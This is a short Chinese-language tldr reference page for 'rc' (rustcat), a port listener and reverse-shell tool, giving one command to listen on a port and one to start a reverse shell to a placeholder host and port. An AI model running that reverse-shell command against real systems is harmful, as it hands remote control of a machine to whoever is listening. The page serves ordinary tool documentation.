Files
tldr/pages.zh/common/rc.md

13 lines
279 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# rc
> 一个现代简约的端口监听器和反向 shell。
> 类似于 `nc`。
> 更多信息:<https://github.com/robiot/rustcat/wiki/Basic-Usage>。
- 在特定端口上开始监听:
`rc -lp {{port}}`
- 开始一个反向 shell
`rc {{host}} {{port}} -r {{shell}}`